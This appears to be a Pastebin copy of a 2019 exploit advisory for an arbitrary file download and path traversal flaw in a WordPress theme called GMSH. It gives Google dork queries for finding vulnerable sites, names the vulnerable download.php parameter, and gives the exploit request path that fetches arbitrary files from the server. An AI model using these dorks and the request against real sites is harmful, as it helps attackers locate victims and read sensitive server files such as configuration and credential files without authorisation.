API tools faq
paste
KingSkrupellos

WordPress 4.9.10 GMSH Themes Arbitrary File Download

KingSkrupellos
Mar 18th, 2019
58
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.38 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.9.10 GMSH Themes Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/03/2019
  7. # Vendor Homepage : wordpress.org ~ gmsh.ca
  8. # Software Information Link : gmsh.ca/about-the-gmsh/who-we-are
  9. # Software Version : 4.9.10
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/themes/gmsh/"
  14. intext:Site Proudly Designed by INTENT. Powered by Oasis.
  15. # Vulnerability Type :
  16. CWE-200 [ Information Exposure ]
  17. CWE-23 [ Relative Path Traversal ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ############################################################################################
  23.  
  24. # Impact :
  25. ***********
  26. * WordPress 4.9.10 GMSH Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
  27.  
  28. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
  29.  
  30. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
  31.  
  32. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
  33.  
  34. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
  35.  
  36. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
  37.  
  38. ############################################################################################
  39.  
  40. # Vulnerable File :
  41. ****************
  42. /download.php
  43.  
  44. # Vulnerable Parameter :
  45. **********************
  46. ?download_file=
  47.  
  48. # Arbitrary File Download Exploit :
  49. *******************************
  50. /wp-content/themes/gmsh/lib/download.php?download_file=[FILENAME]
  51.  
  52. ############################################################################################
  53.  
  54. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  55.  
  56. ############################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!